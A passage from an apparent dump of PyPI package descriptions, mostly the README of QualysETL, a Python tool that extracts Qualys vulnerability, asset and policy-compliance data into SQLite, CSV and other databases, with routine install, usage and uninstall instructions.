Just add the filename in your call to qualysapi.connect('config.txt').Example config file; Note, it should be possible to omit any of these entries.[info]hostname=qualysapi.serviceprovider.comusername=jerrypassword=I<3Elaine# Set the maximum number of retries each connection should attempt. Note, this applies only to failed connections and timeouts, never to requests where the server returns a response.max_retries=10[proxy]; This section is optional. Leave it out if you're not using a proxy.; You can use environmental variables as well: http://www.python-requests.org/en/latest/user/advanced/#proxies; proxy_protocol set to https, if not specified.proxy_url=proxy.mycorp.com; proxy_port will override any port specified in proxy_urlproxy_port=8080; proxy authenticationproxy_username=kramerproxy_password=giddy up!LicenseApache License, Version 2.0http://www.apache.org/licenses/LICENSE-2.0.htmlAcknowledgementsSpecial thank you to Colin Bell for qualysconnect."} +{"package": "qualysclient", "pacakge-description": "qualysclientA python SDK for interacting with the Qualys APIInstallationpython -m pip install qualysclientExampleimport qualysclient"} +{"package": "qualysetl", "pacakge-description": "Qualys API Best Practices SeriesExplore theQualys API Best Practices Series, for insightful guidance on maximizing the effectiveness of the Qualys API and QualysETL.\nThis series offers valuable tips, expert advice, and practical strategies to help you optimize your use of the Qualys platform for enhanced cybersecurity and compliance management.\nIdeal for both new and experienced users, it offers key insights and showcases the practical use of QualysETL, enriching your understanding and skills in API interactions and data management.Discover QualysETL: Empowering Cybersecurity with Qualys DataQualysETL is a valuable tool in harnessing the power of Qualys data, enabling organizations to efficiently Measure, Communicate, and Eliminate Cyber Risk. This synergy fortifies businesses against the evolving landscape of digital threats.Innovative Data Management: QualysETL is an open-source Python application crafted to streamline the Extract, Transform, Load (ETL) process. It adeptly handles the distribution of Qualys data into various databases, offering convenient processing of CSV, JSON, and XML data formats.Centralized Data Management: QualysETL allows for the consolidation of all Qualys-generated data into a unified 'gold source' database. This central repository of data is instrumental in enhancing the overall security and compliance capabilities of an organization.Streamlined Data Processing: QualysETL takes the helm in executing API calls, thus systematically preparing Qualys data for organizational use. This level of automation and precision in data processing significantly reduces manual effort and resource allocation.Strengthened Security Posture: The combination of QualysETL and Qualys data equips organizations with the tools necessary to significantly improve their security and compliance frameworks. This collaborative effort is essential in mitigating the risks associated with cyberattacks and ensuring adherence to pertinent legal and regulatory requirements.Getting Started Made Simple: Integrating QualysETL into your organization's cybersecurity strategy is straightforward. 
For an easy setup, refer to theinstallation instructionsprovided in this guide.Schema - QualysETL Vulnerability Data Example.QualysETL: Transforming Cybersecurity with Success StoriesQualysETL has enhanced how customers manage their cybersecurity data. With its robust and automated pipeline, organizations efficiently funnel data into a variety of databases, enhancing security insights and decision-making. Key databases tested include:Azure CosmosDB PostgreSQLPostgreSQLAmazon RedShiftMicrosoft SQL ServerAzure SQL ServerSnowflakeMySQLSQLiteThe success stories of QualysETL are a testament to its versatility and the value it delivers:Enhanced Remediation and Reporting: Integrating Qualys data with corporate resources, customers have seen significant improvements in Remediation Reporting, Metrics, and Visualization, leading to more effective cybersecurity strategies.Advanced Data Analysis: Analysts leverage the rich data sets from Qualys for in-depth forensic examinations, gaining deeper insights into cybersecurity threats and vulnerabilities.Simplified Data Visualization: With QualysETL, simplifying and focusing data for tools like Tableau, PowerBI, or custom web applications has never been easier, enabling more intuitive and accessible cybersecurity analytics.Measurable Cyber Risk Reduction: Customers effectively Measure, Communicate, and Eliminate Cyber Risk, substantially De-Risking their business operations.QualysETL is not just limited to current functionalities. It already supports key Qualys Modules like:Vulnerability ManagementPolicy ComplianceCyberSecurity Asset ManagementWeb Application Scanning DataAnd with an eye on the future, the 2024 roadmap includes exciting additions such as Qualys Container Security and Qualys FIM, further expanding its capabilities and reinforcing its position as a valuable tool in cybersecurity data management.QualysETL Central Data BaseOnce customers have used QualysETL to gather data from various sources such as Qualys Vulnerability Data, Policy Compliance Data, CyberSecurity Asset Management Data, and Web Application Scanning data into a database, there are several critical activities they typically perform to enhance their security posture and compliance. These activities include:Data Analysis and Prioritization:Analyzing the collected data to identify and prioritize security vulnerabilities and compliance issues. This involves sorting through the vulnerabilities to determine which are most critical based on factors like severity, exploitability, and potential impact.Risk Assessment:Performing a comprehensive risk assessment using the data to understand the potential impact of identified vulnerabilities and non-compliance issues on the business.Remediation Planning:Developing remediation plans to address identified vulnerabilities and compliance gaps. This may involve patch management, configuration changes, or other corrective actions.Compliance Monitoring:Using policy compliance data to monitor adherence to internal policies and external regulatory requirements. This helps in ensuring ongoing compliance and identifying areas where policies may need to be adjusted.Asset Management:Leveraging CyberSecurity Asset Management data to maintain an up-to-date inventory of all hardware and software assets. 
This is crucial for effective vulnerability management and ensuring that all assets are accounted for in security planning.Trend Analysis and Reporting:Analyzing trends over time to identify recurring issues or vulnerabilities and generating reports for various stakeholders, including management, IT teams, and external regulators.Incident Response Planning:Utilizing the data to inform and improve incident response plans. By understanding where vulnerabilities exist and how they can be exploited, organizations can develop more effective response strategies.Security Policy Development and Adjustment:Refining and developing security policies based on the insights gained from the data. This might involve updating access controls, data protection strategies, or other security protocols.Training and Awareness Programs:Using insights from the data to inform security training and awareness programs. Understanding common vulnerabilities and compliance issues can help tailor training to address specific organizational needs.Integration with Other Security Tools:Integrating the database with other security tools and platforms for a more cohesive and automated security approach. This can include SIEM (Security Information and Event Management) systems, threat intelligence platforms, and automated remediation tools.Regular Audits and Assessments:Conducting regular audits and assessments to ensure that the security measures are effective and to identify areas for improvement.By effectively utilizing Qualys data, organizations can significantly enhance their security and compliance posture, reducing the likelihood of successful cyber attacks and ensuring adherence to relevant laws and regulations.Key Advantages of Using QualysETLEffortless Data Handling: QualysETL simplifies the process of Extracting, Transforming, Loading, and Distributing Qualys data with a single command, offering a no-code solution that streamlines data management.Versatile Data Preparation: The tool adeptly prepares data in various formats including XML, JSON, SQLite, and CSV. It ensures readiness for seamless integration into popular databases like MySQL, PostgreSQL, Snowflake, Amazon RedShift, and more.Real-Time Data Streaming: Features a streaming data option for the immediate ingestion of vulnerability reports or asset inventory updates, enabling timely updates to your downstream databases.User-Friendly and Quick Setup: QualysETL is designed for easy installation and use. Get it up and running in just 5 minutes on an Ubuntu 22.04 system, ensuring a smooth and swift start.Open Source Flexibility: Distributed under the Apache 2 license, QualysETL offers the benefits of open-source software, including transparency, community support, and the freedom to modify the tool to suit your specific needs.Qualys data Included in QualysETL:KnowledgeBase- QID DefinitionsHost List- Host InformationHost List Detection- Host Vulnerability InformationCyberSecurity Asset Inventory- Detailed Asset InventoryWeb Application Scanning- Web Applications and Web Application Vulnerability Findings.PCRS Policy Compliance- Policy, Host, and Host Posture Information.Release NotesNote: See the end of this document for history ofrelease notes0.8.85Added etld_config_settings.yaml option to exclude trurisk for edge case where VMDR is not enabled in customer subscription. Ex. 
Consulting Edition.host_list_payload_option_exclude_trurisk: Truehost_list_detection_payload_option_exclude_trurisk: True0.8.80Minor updates to documentation to highlight usage of QualysETL.Added option to etld_config_settings.yaml to manage edge case of non-utf8 data embedded in device information.When set to True, additional processing is added to replace non-utf8 data.xmltodict_parse_using_codec_to_replace_utf8_error: TrueDefault is xmltodict_parse_using_codec_to_replace_utf8_error: FalseMinor updates to first time install and upgrade instructions to add an error check to each, simplify code, and improve portability by calling out'$USER' instead of '$USERNAME'.Table of contentsExamples of UsageQuick StartInstallUninstallQualys API Best Practices SeriesWorkflow DiagramComponent DiagramBlueprintRoadmapTechnologiesETL ExamplesETL KnowledgeBaseETL Host ListETL Host List DetectionETL Asset InventoryETL Web_Application_ScanningETL Policy Compliance PCRSApplication Manager and DataHost List Detection SQLite DatabaseData FormatsLoggingApplication MonitoringSecuring Your Application in the Data CenterPassword VaultExample Run LogsUninstall and Install qetlqetl_setup_python_envqetl_manage_userqetl_manage_user Add Userqetl_manage_user ETL KnowledgeBaseReview ETL KnowledgeBase DataLicenseChangeLogRelease Notes LogUsage Information - qetl_manage_user1) Help Screen.Please enter -u [ your /opt/qetl/users/ user home directory path ]\n\n Note: /opt/qetl/users/newuser is the root directory for your qetl userhome directory,\n Example:\n qetl_manage_user -u /opt/qetl/users/[your_user_name]\n \n usage: qetl_manage_user [-h] [-u qetl_USER_HOME_DIR] [-e etl_[module] ] [-e validate_etl_[module] ] [-c] [-t] [-i] [-d] [-r] [-l]\n \n Command to Extract, Transform and Load Qualys data into various forms ( CSV, JSON, SQLITE3 DATABASE )\n \n optional arguments:\n -h, --help show this help message and exit\n -u Home Directory Path, --qetl_user_home_dir Home directory Path\n Example:\n - /opt/qetl/users/q_username\n -e etl_[module], --execute_etl_[module] execute etl of module name. valid options are:\n -e etl_knowledgebase \n -e etl_host_list \n -e etl_host_list_detection\n -e etl_asset_inventory\n -e etl_was\n -e etl_pcrs\n -e etl_test_system ( for a small system test of all ETL Jobs )\n -e validate_etl_[module], --validate_etl_[module] [test last run of etl_[module]]. valid options are:\n -e validate_etl_knowledgebase\n -e validate_etl_host_list \n -e validate_etl_host_list_detection\n -e validate_etl_asset_inventory\n -e validate_etl_was\n -e validate_etl_pcrs\n -e validate_etl_test_system \n -d YYMMDDThh:mm:ssZ, --datetime YYYY-MM-DDThh:mm:ssZ UTC. Get All Data On or After Date. \n Ex. 
1970-01-01T00:00:00Z acts as flag to obtain all data.\n -c, --credentials update qualys api user credentials: qualys username, password or api_fqdn_server\n -t, --test test qualys credentials\n -i, --initialize_user For automation, create a /opt/qetl/users/[userhome] directory \n without being prompted.\n -l, --logs detailed logs sent to stdout for testing qualys credentials\n -v, --version Help and QualysETL version information.\n -r, --report brief report of the users directory structure.\n -p, --prompt-credentials prompt user for credentials, also accepts stdin with credentials piped to program.\n -m, --memory-credentials get credentials from environment: \n Example: q_username=\"your userid\", q_password=your password, q_api_fqdn_server=api fqdn, q_gateway_fqdn_server=gateway api fqdn\n -s, --stdin-credentials send credentials in json to stdin. \n Example:\n {\"q_username\": \"your userid\", \"q_password\": \"your password\", \"q_api_fqdn_server\": \"api fqdn\", \"q_gateway_fqdn_server\": \"gateway api fqdn\"}\n \n Example: ETL Host List Detection\n \n qetl_manage_user -u [path] -e etl_host_list_detection -d 1970-01-01T00:00:00Z\n \n - qetl_manage_user will download all knowledgebase, host list and host list detection vulnerability data,\n transforming/loading it into sqlite and optionally the corresponding distribution directory.\n \n Inputs: \n - KnowledgeBase API, Host List API, Host List Detection API.\n - ETL KnowledgeBase\n - /api/2.0/fo/knowledge_base/vuln/?action=list\n - ETL Host List\n - /api/2.0/fo/asset/host/?action=list\n - ETL Host List Detection - Stream of batches immediately ready for downstream database ingestion.\n - /api/2.0/fo/asset/host/vm/detection/?action=list\n Outputs:\n - XML, JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - host_list_detection_extract_dir - contains native xml and json transform of data from qualys, compressed in uniquely named batches.\n - host_list_detection_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - host_list_detection_sqlite.db - sqlite database will contain multiple tables:\n - Q_Host_List - Host List Asset Data from Host List API.\n - Q_Host_List_Detection_Hosts - Host List Asset Data from Host List Detection API. \n - Q_Host_List_Detection_QIDS - Host List Vulnerability Data from Host List Detection API. \n - Q_KnowledgeBase_In_Host_List_Detection - KnowledgeBase QIDs found in Q_Host_List_Detection_QIDS. \n \n etld_config_settings.yaml notes:\n 1. To Enable CSV Distribution, add the following keys to etld_config_settings.yaml and toggle on/off them via True or False\n kb_distribution_csv_flag: True # populates qetl_home/data/knowledgebase_distribution_dir\n host_list_distribution_csv_flag: True # populates qetl_home/data/host_list_distribution_dir\n host_list_detection_distribution_csv_flag: True # populates qetl_home/data/host_list_detection_distribution_dir\n asset_inventory_distribution_csv_flag: True # populates qetl_home/data/asset_inventory_distribution_dir\n was_distribution_csv_flag: True # populates qetl_home/data/was_distribution_dir\n \n These files are prepared for database load, tested with mysql. No headers are present. 
\n Contact your Qualys TAM and schedule a call with David Gregory if you need assistance with this option.2) ETL Host List Detectionqetl_manage_user -u [path] -e etl_host_list_detection -d 1970-01-01T00:00:00Z\n \n - qetl_manage_user will download all knowledgebase, host list and host list detection vulnerability data,\n transforming/loading it into sqlite and optionally the corresponding distribution directory.\n \n Inputs: \n - KnowledgeBase API, Host List API, Host List Detection API.\n - ETL KnowledgeBase\n - /api/2.0/fo/knowledge_base/vuln/?action=list\n - ETL Host List\n - /api/2.0/fo/asset/host/?action=list\n - ETL Host List Detection - Stream of batches immediately ready for downstream database ingestion.\n - /api/2.0/fo/asset/host/vm/detection/?action=list\n Outputs:\n - XML, JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - host_list_detection_extract_dir - contains native xml and json transform of data from qualys, compressed in uniquely named batches.\n - host_list_detection_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - host_list_detection_sqlite.db - sqlite database will contain multiple tables:\n - Q_Host_List - Host List Asset Data from Host List API.\n - Q_Host_List_Detection_Hosts - Host List Asset Data from Host List Detection API. \n - Q_Host_List_Detection_QIDS - Host List Vulnerability Data from Host List Detection API. \n - Q_KnowledgeBase_In_Host_List_Detection - KnowledgeBase QIDs found in Q_Host_List_Detection_QIDS.Schema etl_host_list_detection - Extract from host_list_detection_sqlite.db file.3) ETL Asset Inventory (GAV/CSAM API)qetl_manage_user -u [path] -e etl_asset_inventory -d 1970-01-01T00:00:00Z\n\n - qetl_manage_user will download all asset inventory data, transforming/loading them into sqlite.\n \n Inputs: \n - Global Asset View/CyberSecurity Asset Management API V2.\n - ETL Asset Inventory - Stream of batches immediately ready for downstream database ingestion.\n - /rest/2.0/search/am/asset?assetLastUpdated=[date]\n Outputs:\n - JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - asset_inventory_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - asset_inventory_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - asset_inventory_sqlite.db - sqlite database will contain multiple tables: \n * Q_Asset_Inventory - Asset Inventory of Asset Last Updated -d 'DATE' to now \n * Q_Asset_Inventory_Software_Unique - Unique List of Software\n * Q_Asset_Inventory_Software_AssetId - Unique List of AssetId to SoftwareSchema etl_asset_inventory - Extract from asset_inventory_sqlite.db file.4) ETL Web Application Data (WAS API)Example: \n \n qetl_manage_user -u [path] -e etl_was -d 1970-01-01T00:00:00Z\n \n Inputs:\n - Web Application Scanning API\n - /qps/rest/3.0/search/was/catalog\n - /qps/rest/3.0/search/was/webapp\n - /qps/rest/3.0/get/was/webapp/\n - /qps/rest/3.0/search/was/finding\n Outputs:\n - was_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - was_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - was_sqlite.db - sqlite database will contain multiple tables: \n * Q_WAS_WebApp - Web Applications and Web Application Details\n * Q_WAS_Finding - Web Application Findings (Vulnerabilities)\n * Q_WAS_Catalog - WAS Module 
CatalogSchema etl_was - Extract from was_sqlite.db file.5) ETL Policy Compliance through PCRSExample: \n \n qetl_manage_user -u [path] -e etl_pcrs -d 1970-01-01T00:00:00Z ( Last Evaluated Date for Policy ).\n \n Inputs:\n - PCRS API\n - /pcrs/1.0/posture/policy/list \n - /pcrs/1.0/posture/hostids\n - /pcrs/1.0/posture/postureInfo\n Outputs:\n - pcrs_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - pcrs_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - pcrs_sqlite.db - sqlite database will contain multiple tables: \n * Q_PCRS_POLICY_LIST - List of policies list with lastEvaluationDate=1970-01-01T00:00:00Z\n * Q_PCRS_HOSTIDS - List of hostids associated with each Active policy.\n * Q_PCRS_POSTUREINFO - Posture Information for each Host.\n \n Configuration:\n - Default:\n * Running qetl_manage_user -u [userpath] -e etl_pcrs -d [evaluation date] will result in \n all data on or after evaluation date being pulled for all assets scanned 1 hour before evaluation date. \n \n - /pcrs/1.0/posture/policy/list\n * qetl_manage_user -d [evaluation date]\n * etld_config_settings.yaml example:\n - pcrs_policy_list_payload_option: {'lastEvaluationDate': '2023-09-04T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n \n - /pcrs/1.0/posture/hostids\n * qetl_manage_user -d [evaluation date] will result in lastEvaluationDate minus 1 hour = lastScanDate \n unless overridden via etld_config_settings.yaml\n * etld_config_settings.yaml example:\n - pcrs_hostids_payload_option: {'lastScanDate': '2023-09-04T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n \n - /pcrs/1.0/posture/postureInfo\n * qetl_manage_user -d [evaluation date] will result in lastEvaluationDate minus 1 hour = lastScanDate \n unless overridden via etld_config_settings.yaml\n * etld_config_settings.yaml examples:\n - pcrs_postureinfo_payload_option: {'lastScanDateFrom': '2023-09-10T00:00:00Z', 'lastScanDateTo': '2023-09-17T00:00:00Z', 'evidenceRequired': '0', 'statusChangedSince': '2023-09-02T00:00:00Z'}\n - pcrs_postureinfo_payload_option: {'evidenceRequired': '1'}\n - pcrs_postureinfo_payload_option: {'statusChangedSince': '2023-09-01T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n ** Optional normalized schema for PCRS, reducing space used by PostureInfo by ~50%.\n - pcrs_postureinfo_schema_normalization_flag: True \n\n\n - etld_config_settings.yaml include/exclude policy examples:\n * Include only the following policy id's \n pcrs_policy_id_include_list: ['123456', '334835'] \n * Exclude the following policy ids.\n pcrs_policy_id_exclude_list: ['880900']Schema etl_pcrs - Extract from pcrs_sqlite.db file.Normalized Schema etl_pcrs - Extract from pcrs_sqlite.db file.With etld_config_settins.yaml, pcrs_postureinfo_schema_normalization_flag: True the following optimized schema will be produced by -e etl_pcrsQuick StartUbuntu 22.04 LTS latest is the primary OS to run QualysETL.Red Hat 9.x latest is an alternative OS that has been tested.Amazon Linux 2023 latest is an alternative OS that has been tested.Contact your TAM and David Gregory for details.Prerequisites Python Module on Ubuntu 22.041) Ubuntu 22.04 LTS\n 2) Python 3.8.5 or Latest Stable Release\n 3) On base 22.04 you'll need two additional packages.\n sudo apt-get install 
python3-venv \n sudo apt install python3-pip\n 4) Disk Space on Host. \n - 100,000 hosts, expect ~400 Gigabytes for full copy of VM Data (Confirmed, Potential, Info Gathered)\n - KnowledgeBase - expect ~1 Gigabyte.\n - Host List - expect ~10 Gigabyte for 100K Hosts.\n - Host List Detection - expect ~300-400 Gigabytes for 100K Hosts.InstallationFirst Time Setup Activity on Ubuntu 22.04Login as \"non-root\" user that will run qualysetl.sudo root authorization required.Create your /opt/qetl application directoryupdate apt package cacheInstall python3-venvInstall python3-pipInstall sqlite3Install sqlite3 sql browserFirst Time Setup Instructions on Ubuntu 22.04#!/usr/bin/env bash# First Time Setup - Pre-create directory /opt/qetl# Login as user that will execute qetl_manage_usersudomkdir/opt/qetlsudochown$USER:$USER/opt/qetl\nsudoaptupdate\nsudoaptinstall-ypython3-venvpython3-pipsqlite3sqlitebrowserAlternative First Time Setup Activity on Red Hat 8.x or Red Hat 9.xLogin as \"non-root\" user that will run qualysetl.sudo root authorization required.Create your /opt/qetl application directoryInstall python3.9Update alternatives to point python3 at python3.9NOTE: sqlitebrowser is not part of Red Hat distribution. You may want to install sqlitebrowser from a trusted source, or select another sqlite workbench.NOTE: On RedHat 9, sqlite3 is not included by default. Please install sqlite3 on Red Hat 9.x.NOTE: On RedHat 9, Python3 is already at python3.9. As a result you will not need to reinstall.Alternative First Time Setup Instructions on Red Hat 8.x or Red Hat 9.xNOTE: On Red Hat 8 or 9, check to see if your distribution already has python3 version 3.9 or greater. \"Ex. python3 --version\". If so, then you can skip reinstalling python and setting alternatives.#!/usr/bin/env bash# First Time Setup - Pre-create directory /opt/qetl# Login as user that will execute qetl_manage_usersudomkdir/opt/qetlsudochown$USER:$USER/opt/qetl\nsudoyum-yinstallpython39\nsudoalternatives--setpython3/usr/bin/python3.9Install or Upgrade QualysETL activity on Ubuntu or Red HatLogin as \"non-root\" user that will run qualysetl.deactivate to exit any current python virtual environment you may be in.Install/Upgrade qualysetl into your/home/$USER/.localpython directoryCreate qualysetl python virtual environment in /opt/qetl/qetl_venv,\ninstalling all required modules in venvExecute qualysetl to see help screenInstall or Upgrade QualysETL Instructions on Ubuntu or Red Hat#!/usr/bin/env bash# Login as user that will execute qetl_manage_user# Install Application in Python Virtual Environment /opt/qetl/qetl_venv# Exit if in a Python virtual environment[-n\"$VIRTUAL_ENV\"]&&{echo\"Please deactivate the virtual environment and rerun this script.\";exit1;}python3-mpipinstall--upgradequalysetl\n~/.local/bin/qetl_setup_python_venv/opt/qetlecho\"Follow instructions output from qetl_setup_python_venv\"Create your first qualysetl userTo setup your first user, you'll need your qualys api username, password and your api fqdn.Example transcript of setting up a new 
userqualysetl@ubuntu:~$source/opt/qetl/qetl_venv/bin/activate(qetl_venv)qualysetl@ubuntu:~$qetl_manage_user-u/opt/qetl/users/quays_dt4\n\nqetl_user_home_dirdoesnotexist:/opt/qetl/users/quays_dt4/qetl_home\nCreatenewqetl_user_home_dir?/opt/qetl/users/quays_dt4/qetl_home(yesorno):yes\n\nqetl_user_home_dircreated:/opt/qetl/users/quays_dt4/qetl_home\n\nCurrentusername:initialuserinconfig:/opt/qetl/users/quays_dt4/qetl_home/cred/.etld_cred.yaml\nUpdateQualysusername?(yesorno):yes\nEnternewQualysusername:quays_dt4\nCurrentapi_fqdn_server:qualysapi.qualys.com\nUpdateapi_fqdn_server?(yesorno):Enternewapi_fqdn_server:qualysapi.qualys.com\nUpdatepasswordforusername:quays_dt4\nUpdatepassword?(yesorno):yes\nEnteryourQualyspassword:Youhaveupdatedyourcredentials.QualysUsername:quays_dt4Qualysapi_fqdn_server:qualysapi.qualys.com\n\n\nWouldyouliketotestlogin/logoutofQualys?(yesorno):yes\n\nQualysLoginTestforquays_dt4atapi_fqdn_server:qualysapi.qualys.com\n\nTestingQualysLoginforquays_dt4Succeededatqualysapi.qualys.comwithHTTPSReturnCode:200.\n\nThankyou,exiting.(qetl_venv)qualysetl@ubuntu:~$Execute your first ETL.Your initial configuration limits the total hosts downloaded to 1000 hosts vm_processed_after\nutc.now - 1 day. The initial configuration will only consume up to 2 connections.\nYou can test this to ensure you are able to download data before moving on to more data.Command - qetl_manage_user -u /opt/qetl/users/quays_dt4 -e etl_host_list_detectionOuputs:Full Knowledgebase on first run.Host List vm_processed_after utc.now - 1 day limited to 1000 hosts for testing.Host List Detection driven by scope of Host List.Transcript of command execution.qetl_manage_user-u/opt/qetl/users/quays_dt4-eetl_host_list_detection\nStartingetl_host_list_detection.Forprogresssee:/opt/qetl/users/quays_dt4/qetl_home/log/host_list_detection.log\nEndingetl_host_list_detection.Forresultssee:/opt/qetl/users/quays_dt4/qetl_home/log/host_list_detection.log\nsqlitebrowser/opt/qetl/users/quays_dt4/qetl_home/data/host_list_detection_sqlite.dbSQLite Browser displaying Knowledgebase, Host List, and Host List Detection. Note that the knowledgebase in this database\nonly includes qids found in host list detection. To see the full knowledgebase, open kb_sqlite.db. 
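The same database can also be inspected programmatically with Python's built-in sqlite3 module. A minimal sketch, not part of QualysETL itself, that lists the tables and views created above and their row counts (the user path is the example one from the transcript; adjust it to your own qetl_home):
# Minimal sketch: enumerate the tables/views in host_list_detection_sqlite.db
# (Q_Host_List, Q_Host_List_Detection_QIDS, ...) and show their row counts.
import sqlite3

db_path = '/opt/qetl/users/quays_dt4/qetl_home/data/host_list_detection_sqlite.db'
conn = sqlite3.connect(db_path)
for name, kind in conn.execute('SELECT name, type FROM sqlite_master ORDER BY name'):
    if kind in ('table', 'view'):
        count = conn.execute(f'SELECT COUNT(*) FROM [{name}]').fetchone()[0]
        print(name, kind, count)
conn.close()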
Q_Host_List_Detection is a view of Q_Host_List ( PREFIX HL_ ), Q_Host_List_Detection_Hosts ( PREFIX HLDH_ ), and Q_Host_List_Detection_QIDS ( PREFIX HLDQ_ ).
Uninstall
Uninstall qualysetl activity on Ubuntu 22.04:
deactivate to exit any current python virtual environment you may be in.
optionally remove application/data:
python virtual environment: /opt/qetl/qetl_venv
qualysetl data directory: /opt/qetl/users
python3-venv
python3-pip
sqlite3
sqlitebrowser
#!/usr/bin/env bash
deactivate  # If you are in a python virtual environment
python3 -m pip uninstall qualysetl
# Optionally remove python virtual env, pip, sqlite3, sqlitebrowser and users application data.
# cd /opt/qetl/
# rm -ir qetl_venv   # Optionally remove qetl_venv
# rm -ir users       # Optionally remove users directory with data
# sudo apt remove -y python3-venv python3-pip sqlite3 sqlitebrowser
Uninstall qualysetl activity on Red Hat 8.x:
deactivate to exit any current python virtual environment you may be in.
optionally remove application/data:
python virtual environment: /opt/qetl/qetl_venv
qualysetl data directory: /opt/qetl/users
#!/usr/bin/env bash
deactivate  # If you are in a python virtual environment
python3 -m pip uninstall qualysetl
# Optionally remove python virtual env and user data
# cd /opt/qetl/
# rm -ir qetl_venv   # Optionally remove qetl_venv
# rm -ir users       # Optionally remove users directory with data
Jump to ETL Examples to transform Qualys data into CSV, JSON and SQLite Databases.
Qualys API Best Practices Series
The example code from the Qualys API Best Practices Series is being hosted here to help customers with an example blueprint to automate transformation of data into their corporate data systems, further enhancing the visibility of outlier systems that are vulnerable. This example code has been enhanced with some exception processing, logging, and a single point of execution, creating an operational context within which to test/develop the code so customers can build automation into their remediation program.
Workflow Diagram
The workflow depicts the flow of ETL for host list detection. The key output is the sqlite database that is ready for distribution.
qetl_manage_user -u [userdir] -e etl_host_list_detection -d [datetime] - Resulting sqlite database ready for distribution.
Component Diagram
The component diagram depicts major system interoperability components that deliver data into the enterprise.
Component | Color | Purpose
--------- | ----- | -------
Execution Environment | Blue | Host and Cloud where this application operates
Application | Grey | Application context to identify Local Docker, Python Application, Host and/or Filesystems
Input | Orange | Qualys data consumed by application
Execution | Green | Execution ETL of Qualys data through various methods. (The Python Execution Environment on Docker or Traditional Host)
Data | Yellow | Host Data Folders that separate Application and Subscription Data Users, along with distribution pipelines representing the distribution of data to external sources, Cloud, Client, Other
Future | Black | TBD Future State Components such as GraphQL Server.
Blueprint
Customers have many options for Qualys API integration today.
Some customers realize they need to develop their own\ninternal code to transform complex data, create custom metrics, create custom reports or ensure data is more accessible within their organizations for metrics and custom reporting.As a result, Qualys decided on creating the API Best Practices Series to jumpstart clients with a blueprint of example code\nto help them automate delivery of complex data into their enterprise.The overarching goal is to simplify our customers security stack and help them significantly reduce cost and\ncomplexity.Key Goals and Solutions of this series are:GoalSolutionAutomate Vulnerability Data accessibility, transformation of complex data for analysisJSON, CSV, SQLite Database Formats of Qualys data readily accessible to Analytical BI Tools for on-demand analysis or for downstream loading into Enterprise Data Storage.A single query interface to Qualys dataTBD Future GraphQL Server interface to data.Automate Capturing Vulnerability Data into corporate processesBlueprint of example code customers can customize to enhance their internal automation \"API-First\" strategy.Automate Distribution of Vulnerability Data to Cloud ProvidersOptional Distribution methods into cloud systems such as Amazon S3 BucketAutomate Application Enhancements and DeliveryDocker application instance for reliable CI/CD delivery of enhancements, as well as traditional host execution on Linux Platforms.Provide Execution Flexibility, Work Load Management, Password SecurityBlueprint for enterprise jobstream execution (Ex. Autosys), password vaults (Ex. Hashicorp), or simple command line execution from a Virtual Machine instance of Ubuntu running on a laptop.Provide Continous Vulnerability Data PipelineBlueprint for data transformation pipeline from Qualys to Enterprise Data Stores in various formats ( JSON, CSV, SQLite Database )RoadmapCapability | Target | Description\n---------- | ------ | -----------\nKnowledgeBase | June 2021 | Automate download and transform of KnowledgeBase into CSV, JSON and SQLite Database\nHost List | June 2021 | Automate download and transform of Host List into CSV, JSON and SQLite Database\nHost List Detection | June 2021 | Automate download and transform of Host List Detection into CSV, JSON and SQLite Database\nPython Virtual Env | June 2021 | Encapsulate qetl Application into Python Virtual Environment at installation.\nAsset Inventory(CSAM) | Oct 2021 | Automate download and transform of GAV/CSAM V2 API into CSV, JSON and SQLite Database\nPerformance Enhancements | Jan 2022 | Begin 0.7.x series with performance enhancements. See change log for details.\nAsset Inventory(CSAM) | Aug 2022 | CSAM API Blog, Video, documentation updates for CSAM, additional edge cases for Qualys Maintenance Windows.\nHost List ARS | Aug 2022 | Host List Asset Risk Score Added to QualysETL.\nHost List Detection QDS | Aug 2022 | Host List Detection Qualys Detection Score Added to QualysETL.\nWeb Application Scanning(WAS) | Dec 2022 | Begin 0.8.x series, including WAS Module and Distribution Option, data prepared for database loader.\nDatabase Injection | Aug 2023 | Methods to inject schema/data from QualysETL into your downstream databases. Ex. Azure Cosmos DB (PostgreSQL), Amazon RedShift, PostgreSQL Open Source, MySql Open Source, SnowFlake, Microsoft SQL Server. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \nVisualization Use Case | Aug 2023 | Use QualysETL to build your downstream databases for use with PowerBI, Tableau, Etc. 
Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \nQWEB 10.23 Updates | Aug 2023 | Delivered additional fields for Host List and Host List Detection. For details see: See [QWEB 10.23 release notification for details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \nWeb Application Scanning(WAS) | Aug 2023 | Updated timing in WAS for long running jobs.\nDocker Image | Aug 2023 | Contact your TAM to schedule a call with David Gregory. Encapsulate Python Application into distributable docker image for ease os operation and upgrade.\nPolicy Compliance | Oct 2023 | PCRS Delivered (multi-threaded). Automate download and transform of Policies, Hosts and Posture Information for your hosts. \nWAS Blog | Oct 2023 | Blog for WAS Module. \nPolicy Compliance Blog | Oct 2023 | Blog for Policy Compliance Module. \nContainer Security | Mar 2024 | Container Security Image and Container Vulnerability Data.\nOther Modules | 2024 | FIM and other modules targeted for 2024 TBD.TechnologiesProject tested with:Ubuntu version: 22.04Redhat version: 8.x/9.x latestSQLite3 version: 3.31.1Python version: 3.8.5Qualys API: latestExamples of 